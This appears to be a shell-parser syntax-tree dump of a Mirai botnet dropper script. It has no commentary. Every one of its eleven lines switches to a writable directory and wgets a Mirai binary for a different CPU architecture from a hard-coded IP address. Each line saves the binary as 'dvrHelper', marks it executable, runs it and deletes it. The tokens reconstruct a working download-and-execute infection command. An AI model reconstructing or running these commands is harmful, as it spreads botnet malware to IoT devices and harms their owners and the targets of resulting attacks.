ListNode(lineno=2, pos=(13, 174), parts=[
  CommandNode(lineno=2, pos=(13, 20), parts=[
    WordNode(lineno=2, pos=(13, 15), word='cd'),
    WordNode(lineno=2, pos=(16, 20), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(21, 23)),
  CommandNode(lineno=2, pos=(24, 35), parts=[
    WordNode(lineno=2, pos=(24, 26), word='cd'),
    WordNode(lineno=2, pos=(27, 35), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(36, 38)),
  CommandNode(lineno=2, pos=(39, 46), parts=[
    WordNode(lineno=2, pos=(39, 41), word='cd'),
    WordNode(lineno=2, pos=(42, 46), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(47, 49)),
  CommandNode(lineno=2, pos=(50, 58), parts=[
    WordNode(lineno=2, pos=(50, 52), word='cd'),
    WordNode(lineno=2, pos=(53, 58), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(59, 61)),
  CommandNode(lineno=2, pos=(62, 66), parts=[
    WordNode(lineno=2, pos=(62, 64), word='cd'),
    WordNode(lineno=2, pos=(65, 66), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(66, 67)),
  CommandNode(lineno=2, pos=(68, 122), parts=[
    WordNode(lineno=2, pos=(68, 72), word='wget'),
    WordNode(lineno=2, pos=(73, 109), word='http://35.189.174.126/tdyi/mirai.arm'),
    WordNode(lineno=2, pos=(110, 112), word='-O'),
    WordNode(lineno=2, pos=(113, 122), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 142), parts=[
    WordNode(lineno=2, pos=(124, 129), word='chmod'),
    WordNode(lineno=2, pos=(130, 132), word='+x'),
    WordNode(lineno=2, pos=(133, 142), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(142, 143)),
  CommandNode(lineno=2, pos=(144, 155), parts=[
    WordNode(lineno=2, pos=(144, 155), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(155, 156)),
  CommandNode(lineno=2, pos=(157, 174), parts=[
    WordNode(lineno=2, pos=(157, 159), word='rm'),
    WordNode(lineno=2, pos=(160, 163), word='-rf'),
    WordNode(lineno=2, pos=(164, 174), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=3, pos=(175, 337), parts=[
  CommandNode(lineno=3, pos=(175, 182), parts=[
    WordNode(lineno=3, pos=(175, 177), word='cd'),
    WordNode(lineno=3, pos=(178, 182), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(183, 185)),
  CommandNode(lineno=3, pos=(186, 197), parts=[
    WordNode(lineno=3, pos=(186, 188), word='cd'),
    WordNode(lineno=3, pos=(189, 197), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(198, 200)),
  CommandNode(lineno=3, pos=(201, 208), parts=[
    WordNode(lineno=3, pos=(201, 203), word='cd'),
    WordNode(lineno=3, pos=(204, 208), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(209, 211)),
  CommandNode(lineno=3, pos=(212, 220), parts=[
    WordNode(lineno=3, pos=(212, 214), word='cd'),
    WordNode(lineno=3, pos=(215, 220), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(221, 223)),
  CommandNode(lineno=3, pos=(224, 228), parts=[
    WordNode(lineno=3, pos=(224, 226), word='cd'),
    WordNode(lineno=3, pos=(227, 228), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(228, 229)),
  CommandNode(lineno=3, pos=(230, 285), parts=[
    WordNode(lineno=3, pos=(230, 234), word='wget'),
    WordNode(lineno=3, pos=(235, 272), word='http://35.189.174.126/tdyi/mirai.m68k'),
    WordNode(lineno=3, pos=(273, 275), word='-O'),
    WordNode(lineno=3, pos=(276, 285), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(285, 286)),
  CommandNode(lineno=3, pos=(287, 305), parts=[
    WordNode(lineno=3, pos=(287, 292), word='chmod'),
    WordNode(lineno=3, pos=(293, 295), word='+x'),
    WordNode(lineno=3, pos=(296, 305), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(305, 306)),
  CommandNode(lineno=3, pos=(307, 318), parts=[
    WordNode(lineno=3, pos=(307, 318), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(318, 319)),
  CommandNode(lineno=3, pos=(320, 337), parts=[
    WordNode(lineno=3, pos=(320, 322), word='rm'),
    WordNode(lineno=3, pos=(323, 326), word='-rf'),
    WordNode(lineno=3, pos=(327, 337), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=4, pos=(338, 500), parts=[
  CommandNode(lineno=4, pos=(338, 345), parts=[
    WordNode(lineno=4, pos=(338, 340), word='cd'),
    WordNode(lineno=4, pos=(341, 345), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(346, 348)),
  CommandNode(lineno=4, pos=(349, 360), parts=[
    WordNode(lineno=4, pos=(349, 351), word='cd'),
    WordNode(lineno=4, pos=(352, 360), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(361, 363)),
  CommandNode(lineno=4, pos=(364, 371), parts=[
    WordNode(lineno=4, pos=(364, 366), word='cd'),
    WordNode(lineno=4, pos=(367, 371), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(372, 374)),
  CommandNode(lineno=4, pos=(375, 383), parts=[
    WordNode(lineno=4, pos=(375, 377), word='cd'),
    WordNode(lineno=4, pos=(378, 383), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(384, 386)),
  CommandNode(lineno=4, pos=(387, 391), parts=[
    WordNode(lineno=4, pos=(387, 389), word='cd'),
    WordNode(lineno=4, pos=(390, 391), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(391, 392)),
  CommandNode(lineno=4, pos=(393, 448), parts=[
    WordNode(lineno=4, pos=(393, 397), word='wget'),
    WordNode(lineno=4, pos=(398, 435), word='http://35.189.174.126/tdyi/mirai.mips'),
    WordNode(lineno=4, pos=(436, 438), word='-O'),
    WordNode(lineno=4, pos=(439, 448), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(448, 449)),
  CommandNode(lineno=4, pos=(450, 468), parts=[
    WordNode(lineno=4, pos=(450, 455), word='chmod'),
    WordNode(lineno=4, pos=(456, 458), word='+x'),
    WordNode(lineno=4, pos=(459, 468), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(468, 469)),
  CommandNode(lineno=4, pos=(470, 481), parts=[
    WordNode(lineno=4, pos=(470, 481), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(481, 482)),
  CommandNode(lineno=4, pos=(483, 500), parts=[
    WordNode(lineno=4, pos=(483, 485), word='rm'),
    WordNode(lineno=4, pos=(486, 489), word='-rf'),
    WordNode(lineno=4, pos=(490, 500), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=5, pos=(501, 663), parts=[
  CommandNode(lineno=5, pos=(501, 508), parts=[
    WordNode(lineno=5, pos=(501, 503), word='cd'),
    WordNode(lineno=5, pos=(504, 508), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(509, 511)),
  CommandNode(lineno=5, pos=(512, 523), parts=[
    WordNode(lineno=5, pos=(512, 514), word='cd'),
    WordNode(lineno=5, pos=(515, 523), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(524, 526)),
  CommandNode(lineno=5, pos=(527, 534), parts=[
    WordNode(lineno=5, pos=(527, 529), word='cd'),
    WordNode(lineno=5, pos=(530, 534), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(535, 537)),
  CommandNode(lineno=5, pos=(538, 546), parts=[
    WordNode(lineno=5, pos=(538, 540), word='cd'),
    WordNode(lineno=5, pos=(541, 546), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(547, 549)),
  CommandNode(lineno=5, pos=(550, 554), parts=[
    WordNode(lineno=5, pos=(550, 552), word='cd'),
    WordNode(lineno=5, pos=(553, 554), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(554, 555)),
  CommandNode(lineno=5, pos=(556, 611), parts=[
    WordNode(lineno=5, pos=(556, 560), word='wget'),
    WordNode(lineno=5, pos=(561, 598), word='http://35.189.174.126/tdyi/mirai.mpsl'),
    WordNode(lineno=5, pos=(599, 601), word='-O'),
    WordNode(lineno=5, pos=(602, 611), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(611, 612)),
  CommandNode(lineno=5, pos=(613, 631), parts=[
    WordNode(lineno=5, pos=(613, 618), word='chmod'),
    WordNode(lineno=5, pos=(619, 621), word='+x'),
    WordNode(lineno=5, pos=(622, 631), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(631, 632)),
  CommandNode(lineno=5, pos=(633, 644), parts=[
    WordNode(lineno=5, pos=(633, 644), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(644, 645)),
  CommandNode(lineno=5, pos=(646, 663), parts=[
    WordNode(lineno=5, pos=(646, 648), word='rm'),
    WordNode(lineno=5, pos=(649, 652), word='-rf'),
    WordNode(lineno=5, pos=(653, 663), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=6, pos=(664, 825), parts=[
  CommandNode(lineno=6, pos=(664, 671), parts=[
    WordNode(lineno=6, pos=(664, 666), word='cd'),
    WordNode(lineno=6, pos=(667, 671), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(672, 674)),
  CommandNode(lineno=6, pos=(675, 686), parts=[
    WordNode(lineno=6, pos=(675, 677), word='cd'),
    WordNode(lineno=6, pos=(678, 686), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(687, 689)),
  CommandNode(lineno=6, pos=(690, 697), parts=[
    WordNode(lineno=6, pos=(690, 692), word='cd'),
    WordNode(lineno=6, pos=(693, 697), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(698, 700)),
  CommandNode(lineno=6, pos=(701, 709), parts=[
    WordNode(lineno=6, pos=(701, 703), word='cd'),
    WordNode(lineno=6, pos=(704, 709), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(710, 712)),
  CommandNode(lineno=6, pos=(713, 717), parts=[
    WordNode(lineno=6, pos=(713, 715), word='cd'),
    WordNode(lineno=6, pos=(716, 717), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(717, 718)),
  CommandNode(lineno=6, pos=(719, 773), parts=[
    WordNode(lineno=6, pos=(719, 723), word='wget'),
    WordNode(lineno=6, pos=(724, 760), word='http://35.189.174.126/tdyi/mirai.x86'),
    WordNode(lineno=6, pos=(761, 763), word='-O'),
    WordNode(lineno=6, pos=(764, 773), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(773, 774)),
  CommandNode(lineno=6, pos=(775, 793), parts=[
    WordNode(lineno=6, pos=(775, 780), word='chmod'),
    WordNode(lineno=6, pos=(781, 783), word='+x'),
    WordNode(lineno=6, pos=(784, 793), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(793, 794)),
  CommandNode(lineno=6, pos=(795, 806), parts=[
    WordNode(lineno=6, pos=(795, 806), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(806, 807)),
  CommandNode(lineno=6, pos=(808, 825), parts=[
    WordNode(lineno=6, pos=(808, 810), word='rm'),
    WordNode(lineno=6, pos=(811, 814), word='-rf'),
    WordNode(lineno=6, pos=(815, 825), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=7, pos=(826, 987), parts=[
  CommandNode(lineno=7, pos=(826, 833), parts=[
    WordNode(lineno=7, pos=(826, 828), word='cd'),
    WordNode(lineno=7, pos=(829, 833), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(834, 836)),
  CommandNode(lineno=7, pos=(837, 848), parts=[
    WordNode(lineno=7, pos=(837, 839), word='cd'),
    WordNode(lineno=7, pos=(840, 848), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(849, 851)),
  CommandNode(lineno=7, pos=(852, 859), parts=[
    WordNode(lineno=7, pos=(852, 854), word='cd'),
    WordNode(lineno=7, pos=(855, 859), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(860, 862)),
  CommandNode(lineno=7, pos=(863, 871), parts=[
    WordNode(lineno=7, pos=(863, 865), word='cd'),
    WordNode(lineno=7, pos=(866, 871), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(872, 874)),
  CommandNode(lineno=7, pos=(875, 879), parts=[
    WordNode(lineno=7, pos=(875, 877), word='cd'),
    WordNode(lineno=7, pos=(878, 879), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(879, 880)),
  CommandNode(lineno=7, pos=(881, 935), parts=[
    WordNode(lineno=7, pos=(881, 885), word='wget'),
    WordNode(lineno=7, pos=(886, 922), word='http://35.189.174.126/tdyi/mirai.spc'),
    WordNode(lineno=7, pos=(923, 925), word='-O'),
    WordNode(lineno=7, pos=(926, 935), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(935, 936)),
  CommandNode(lineno=7, pos=(937, 955), parts=[
    WordNode(lineno=7, pos=(937, 942), word='chmod'),
    WordNode(lineno=7, pos=(943, 945), word='+x'),
    WordNode(lineno=7, pos=(946, 955), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(955, 956)),
  CommandNode(lineno=7, pos=(957, 968), parts=[
    WordNode(lineno=7, pos=(957, 968), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(968, 969)),
  CommandNode(lineno=7, pos=(970, 987), parts=[
    WordNode(lineno=7, pos=(970, 972), word='rm'),
    WordNode(lineno=7, pos=(973, 976), word='-rf'),
    WordNode(lineno=7, pos=(977, 987), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=8, pos=(988, 1150), parts=[
  CommandNode(lineno=8, pos=(988, 995), parts=[
    WordNode(lineno=8, pos=(988, 990), word='cd'),
    WordNode(lineno=8, pos=(991, 995), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(996, 998)),
  CommandNode(lineno=8, pos=(999, 1010), parts=[
    WordNode(lineno=8, pos=(999, 1001), word='cd'),
    WordNode(lineno=8, pos=(1002, 1010), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1011, 1013)),
  CommandNode(lineno=8, pos=(1014, 1021), parts=[
    WordNode(lineno=8, pos=(1014, 1016), word='cd'),
    WordNode(lineno=8, pos=(1017, 1021), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1022, 1024)),
  CommandNode(lineno=8, pos=(1025, 1033), parts=[
    WordNode(lineno=8, pos=(1025, 1027), word='cd'),
    WordNode(lineno=8, pos=(1028, 1033), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1034, 1036)),
  CommandNode(lineno=8, pos=(1037, 1041), parts=[
    WordNode(lineno=8, pos=(1037, 1039), word='cd'),
    WordNode(lineno=8, pos=(1040, 1041), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1041, 1042)),
  CommandNode(lineno=8, pos=(1043, 1098), parts=[
    WordNode(lineno=8, pos=(1043, 1047), word='wget'),
    WordNode(lineno=8, pos=(1048, 1085), word='http://35.189.174.126/tdyi/mirai.arm7'),
    WordNode(lineno=8, pos=(1086, 1088), word='-O'),
    WordNode(lineno=8, pos=(1089, 1098), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1098, 1099)),
  CommandNode(lineno=8, pos=(1100, 1118), parts=[
    WordNode(lineno=8, pos=(1100, 1105), word='chmod'),
    WordNode(lineno=8, pos=(1106, 1108), word='+x'),
    WordNode(lineno=8, pos=(1109, 1118), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1118, 1119)),
  CommandNode(lineno=8, pos=(1120, 1131), parts=[
    WordNode(lineno=8, pos=(1120, 1131), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1131, 1132)),
  CommandNode(lineno=8, pos=(1133, 1150), parts=[
    WordNode(lineno=8, pos=(1133, 1135), word='rm'),
    WordNode(lineno=8, pos=(1136, 1139), word='-rf'),
    WordNode(lineno=8, pos=(1140, 1150), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=9, pos=(1151, 1314), parts=[
  CommandNode(lineno=9, pos=(1151, 1158), parts=[
    WordNode(lineno=9, pos=(1151, 1153), word='cd'),
    WordNode(lineno=9, pos=(1154, 1158), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1159, 1161)),
  CommandNode(lineno=9, pos=(1162, 1173), parts=[
    WordNode(lineno=9, pos=(1162, 1164), word='cd'),
    WordNode(lineno=9, pos=(1165, 1173), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1174, 1176)),
  CommandNode(lineno=9, pos=(1177, 1184), parts=[
    WordNode(lineno=9, pos=(1177, 1179), word='cd'),
    WordNode(lineno=9, pos=(1180, 1184), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1185, 1187)),
  CommandNode(lineno=9, pos=(1188, 1196), parts=[
    WordNode(lineno=9, pos=(1188, 1190), word='cd'),
    WordNode(lineno=9, pos=(1191, 1196), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1197, 1199)),
  CommandNode(lineno=9, pos=(1200, 1204), parts=[
    WordNode(lineno=9, pos=(1200, 1202), word='cd'),
    WordNode(lineno=9, pos=(1203, 1204), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1204, 1205)),
  CommandNode(lineno=9, pos=(1206, 1262), parts=[
    WordNode(lineno=9, pos=(1206, 1210), word='wget'),
    WordNode(lineno=9, pos=(1211, 1249), word='http://35.189.174.126/tdyi/mirai.arm5n'),
    WordNode(lineno=9, pos=(1250, 1252), word='-O'),
    WordNode(lineno=9, pos=(1253, 1262), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1262, 1263)),
  CommandNode(lineno=9, pos=(1264, 1282), parts=[
    WordNode(lineno=9, pos=(1264, 1269), word='chmod'),
    WordNode(lineno=9, pos=(1270, 1272), word='+x'),
    WordNode(lineno=9, pos=(1273, 1282), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1282, 1283)),
  CommandNode(lineno=9, pos=(1284, 1295), parts=[
    WordNode(lineno=9, pos=(1284, 1295), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1295, 1296)),
  CommandNode(lineno=9, pos=(1297, 1314), parts=[
    WordNode(lineno=9, pos=(1297, 1299), word='rm'),
    WordNode(lineno=9, pos=(1300, 1303), word='-rf'),
    WordNode(lineno=9, pos=(1304, 1314), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=10, pos=(1315, 1476), parts=[
  CommandNode(lineno=10, pos=(1315, 1322), parts=[
    WordNode(lineno=10, pos=(1315, 1317), word='cd'),
    WordNode(lineno=10, pos=(1318, 1322), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1323, 1325)),
  CommandNode(lineno=10, pos=(1326, 1337), parts=[
    WordNode(lineno=10, pos=(1326, 1328), word='cd'),
    WordNode(lineno=10, pos=(1329, 1337), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1338, 1340)),
  CommandNode(lineno=10, pos=(1341, 1348), parts=[
    WordNode(lineno=10, pos=(1341, 1343), word='cd'),
    WordNode(lineno=10, pos=(1344, 1348), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1349, 1351)),
  CommandNode(lineno=10, pos=(1352, 1360), parts=[
    WordNode(lineno=10, pos=(1352, 1354), word='cd'),
    WordNode(lineno=10, pos=(1355, 1360), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1361, 1363)),
  CommandNode(lineno=10, pos=(1364, 1368), parts=[
    WordNode(lineno=10, pos=(1364, 1366), word='cd'),
    WordNode(lineno=10, pos=(1367, 1368), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1368, 1369)),
  CommandNode(lineno=10, pos=(1370, 1424), parts=[
    WordNode(lineno=10, pos=(1370, 1374), word='wget'),
    WordNode(lineno=10, pos=(1375, 1411), word='http://35.189.174.126/tdyi/mirai.arm'),
    WordNode(lineno=10, pos=(1412, 1414), word='-O'),
    WordNode(lineno=10, pos=(1415, 1424), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1424, 1425)),
  CommandNode(lineno=10, pos=(1426, 1444), parts=[
    WordNode(lineno=10, pos=(1426, 1431), word='chmod'),
    WordNode(lineno=10, pos=(1432, 1434), word='+x'),
    WordNode(lineno=10, pos=(1435, 1444), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1444, 1445)),
  CommandNode(lineno=10, pos=(1446, 1457), parts=[
    WordNode(lineno=10, pos=(1446, 1457), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1457, 1458)),
  CommandNode(lineno=10, pos=(1459, 1476), parts=[
    WordNode(lineno=10, pos=(1459, 1461), word='rm'),
    WordNode(lineno=10, pos=(1462, 1465), word='-rf'),
    WordNode(lineno=10, pos=(1466, 1476), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=11, pos=(1477, 1638), parts=[
  CommandNode(lineno=11, pos=(1477, 1484), parts=[
    WordNode(lineno=11, pos=(1477, 1479), word='cd'),
    WordNode(lineno=11, pos=(1480, 1484), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1485, 1487)),
  CommandNode(lineno=11, pos=(1488, 1499), parts=[
    WordNode(lineno=11, pos=(1488, 1490), word='cd'),
    WordNode(lineno=11, pos=(1491, 1499), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1500, 1502)),
  CommandNode(lineno=11, pos=(1503, 1510), parts=[
    WordNode(lineno=11, pos=(1503, 1505), word='cd'),
    WordNode(lineno=11, pos=(1506, 1510), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1511, 1513)),
  CommandNode(lineno=11, pos=(1514, 1522), parts=[
    WordNode(lineno=11, pos=(1514, 1516), word='cd'),
    WordNode(lineno=11, pos=(1517, 1522), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1523, 1525)),
  CommandNode(lineno=11, pos=(1526, 1530), parts=[
    WordNode(lineno=11, pos=(1526, 1528), word='cd'),
    WordNode(lineno=11, pos=(1529, 1530), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1530, 1531)),
  CommandNode(lineno=11, pos=(1532, 1586), parts=[
    WordNode(lineno=11, pos=(1532, 1536), word='wget'),
    WordNode(lineno=11, pos=(1537, 1573), word='http://35.189.174.126/tdyi/mirai.ppc'),
    WordNode(lineno=11, pos=(1574, 1576), word='-O'),
    WordNode(lineno=11, pos=(1577, 1586), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1586, 1587)),
  CommandNode(lineno=11, pos=(1588, 1606), parts=[
    WordNode(lineno=11, pos=(1588, 1593), word='chmod'),
    WordNode(lineno=11, pos=(1594, 1596), word='+x'),
    WordNode(lineno=11, pos=(1597, 1606), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1606, 1607)),
  CommandNode(lineno=11, pos=(1608, 1619), parts=[
    WordNode(lineno=11, pos=(1608, 1619), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1619, 1620)),
  CommandNode(lineno=11, pos=(1621, 1638), parts=[
    WordNode(lineno=11, pos=(1621, 1623), word='rm'),
    WordNode(lineno=11, pos=(1624, 1627), word='-rf'),
    WordNode(lineno=11, pos=(1628, 1638), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=12, pos=(1639, 1800), parts=[
  CommandNode(lineno=12, pos=(1639, 1646), parts=[
    WordNode(lineno=12, pos=(1639, 1641), word='cd'),
    WordNode(lineno=12, pos=(1642, 1646), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1647, 1649)),
  CommandNode(lineno=12, pos=(1650, 1661), parts=[
    WordNode(lineno=12, pos=(1650, 1652), word='cd'),
    WordNode(lineno=12, pos=(1653, 1661), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1662, 1664)),
  CommandNode(lineno=12, pos=(1665, 1672), parts=[
    WordNode(lineno=12, pos=(1665, 1667), word='cd'),
    WordNode(lineno=12, pos=(1668, 1672), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1673, 1675)),
  CommandNode(lineno=12, pos=(1676, 1684), parts=[
    WordNode(lineno=12, pos=(1676, 1678), word='cd'),
    WordNode(lineno=12, pos=(1679, 1684), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1685, 1687)),
  CommandNode(lineno=12, pos=(1688, 1692), parts=[
    WordNode(lineno=12, pos=(1688, 1690), word='cd'),
    WordNode(lineno=12, pos=(1691, 1692), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1692, 1693)),
  CommandNode(lineno=12, pos=(1694, 1748), parts=[
    WordNode(lineno=12, pos=(1694, 1698), word='wget'),
    WordNode(lineno=12, pos=(1699, 1735), word='http://35.189.174.126/tdyi/mirai.sh4'),
    WordNode(lineno=12, pos=(1736, 1738), word='-O'),
    WordNode(lineno=12, pos=(1739, 1748), word='dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1748, 1749)),
  CommandNode(lineno=12, pos=(1750, 1768), parts=[
    WordNode(lineno=12, pos=(1750, 1755), word='chmod'),
    WordNode(lineno=12, pos=(1756, 1758), word='+x'),
    WordNode(lineno=12, pos=(1759, 1768), word='dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1768, 1769)),
  CommandNode(lineno=12, pos=(1770, 1781), parts=[
    WordNode(lineno=12, pos=(1770, 1781), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1781, 1782)),
  CommandNode(lineno=12, pos=(1783, 1800), parts=[
    WordNode(lineno=12, pos=(1783, 1785), word='rm'),
    WordNode(lineno=12, pos=(1786, 1789), word='-rf'),
    WordNode(lineno=12, pos=(1790, 1800), word='dvrHelper\r'),
  ]),
])
